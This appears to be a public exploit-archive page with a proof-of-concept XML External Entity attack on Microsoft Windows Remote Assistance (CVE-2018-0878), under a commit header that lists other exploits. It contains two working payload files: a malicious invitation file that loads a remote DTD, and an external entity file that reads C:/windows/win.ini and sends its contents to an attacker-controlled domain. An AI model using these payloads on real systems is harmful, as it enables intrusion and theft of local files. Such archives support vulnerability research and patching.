4fd08ae698
6 changes to exploits/shellcodes TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC) TwonkyMedia Server 7.0.11-8.5 - Directory Traversal TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting Microsoft Windows Remote Assistance - XML External Entity Injection Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change Open-AuditIT Professional 2.1 - Cross-Site Scripting
21 lines
No EOL
787 B
Text
21 lines
No EOL
787 B
Text
# Exploit Title: Microsoft Windows Remote Assistance XXE
|
|
# Date: 27/03/2018
|
|
# Exploit Author: Nabeel Ahmed
|
|
# Tested on: Windows 7 (x64), Windows 10 (x64)
|
|
# CVE : CVE-2018-0878
|
|
# Category: Remote Exploits
|
|
|
|
Invitation.msrcincident
|
|
------------------------
|
|
<?xml version="1.0" encoding="UTF-8" ?>
|
|
<!DOCTYPE zsl [
|
|
<!ENTITY % remote SYSTEM "http://<yourdomain.com>/xxe.xml">
|
|
%remote;%root;%oob;]>
|
|
|
|
xxe.xml
|
|
------------------------
|
|
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
|
|
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://<yourdomain.com>/?%payload;'> ">
|
|
|
|
Reference: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability/
|
|
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com) |